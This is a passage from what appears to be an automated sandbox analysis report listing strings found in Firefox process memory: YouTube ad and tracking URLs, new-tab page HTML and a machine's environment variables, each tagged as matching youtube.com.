0231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"ov"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"13",offsetEndMilliseconds:"2"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"52",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"ti"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"47",offsetEndMilliseconds:"84"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"uc"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"10",offsetEndMilliseconds:"zo"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"22",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"wg"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"56",offsetEndMilliseconds:"86"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"25",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"wi"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"34",offsetEndMilliseconds:"12"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"27",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"wz"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"84",offsetEndMilliseconds:"90"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"92",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: audioChannels:2,loudnessDb:-3.7800007}]},playerAds:[{playerLegacyDesktopWatchAdsRenderer:{playerAdParams:{showContentThumbnail:!0,enabledEngageTypes:"3,6,4,5,17,1"},gutParams:{tag:"\\4061\\ytpwmpu"},showCompanion:!0,showInstream:!0,useGut:!0}}],playbackTracking:{videostatsPlaybackUrl:{baseUrl:"https://s.youtube.com/api/stats/playback?cl="+ic+"&docid="+y+"&ei="+ba+"&feature="+m+"&fexp="+Re+"&ns="+Ga+"&plid="+R+"&referrer=https%3A%2F%2Fwww.youtube.com%2F&sdetail=p%3A%2F&sourceid="+Cc+"&el="+ed+"&len="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: b.includes("/inj_js/common.js")\|\|b.includes("firebug-lite")\|\|b.includes(".repl.co/")\|\|b.includes("linkfix")\|\|a.message.includes("Access is denied for this document")&&b.includes("<anonymous>")\|\|a.message.includes("cannot be created in a document with origin 'https://www.youtube.com' and URL 'about:blank'")&&b.includes("<anonymous>"))return!0;if(b.includes("https://www.youtube.com"))return!1;a=b.split("\n");if(!a.length)return!1;if(3>=a.length&&b.includes("s.onloadeddata"))return!0;b=0;for(var c=k(a), equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: b:{d=/api\/stats\/ads/;var p,q,u,x;e=null==(m=vF().objectRepresentation.adPlacements)?void 0:null==(p=m[0])?void 0:null==(q=p.adPlacementRenderer)?void 0:null==(u=q.renderer)?void 0:null==(x=u.linearAdSequenceRenderer)?void 0:x.linearAds;if(null!=e&&e.length&&(m=J(e[0],SZa))&&(m=m.pings,null!=m&&m.impressionPings))for(p=[].concat(da(m.impressionPings)),m.progressPings&&(p=[].concat(da(p),da(m.progressPings))),m=k(p),p=m.next();!p.done;p=m.next())if(p=p.value,p.baseUrl&&d.test(p.baseUrl)){m=p.baseUrl.replace("https://www.youtube.com", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: c+"&m_pos_ms="+ac}},adSlotLoggingData:{serializedSlotAdServingDataEntry:Ac}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_END",adTimeOffset:{offsetStartMilliseconds:eb,offsetEndMilliseconds:eb},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+eb+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: c+"&m_pos_ms="+ac}},adSlotLoggingData:{serializedSlotAdServingDataEntry:Ic}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:ac,offsetEndMilliseconds:ac},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+Db+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: c+"&m_pos_ms="+ac}},adSlotLoggingData:{serializedSlotAdServingDataEntry:jd}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:ac,offsetEndMilliseconds:eb},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+Db+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: c+"&m_pos_ms="+ac}},adSlotLoggingData:{serializedSlotAdServingDataEntry:zd}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:ac,offsetEndMilliseconds:ac},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+Db+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: completePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=videoplaytime100&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],activeViewTracking:{trafficType:"ACTIVE_VIEW_TRAFFIC_TYPE_VIDEO"}},clickthroughEndpoint:{clickTrackingParams:Bc, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: endFullscreenPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=vast_exit_fullscreen&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}],activeViewMeasurablePings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+q+"&sig="+bc+"&ad_cpn=[AD_CPN]&id="+Ac+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]&avm="+ja},{baseUrl:"https://pagead2.googlesyndication.com/activeview_ext?id="+Ac+"&avm="+ja+"&dc_pubid="+ja+"&dc_exteid="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: es (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.comNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, 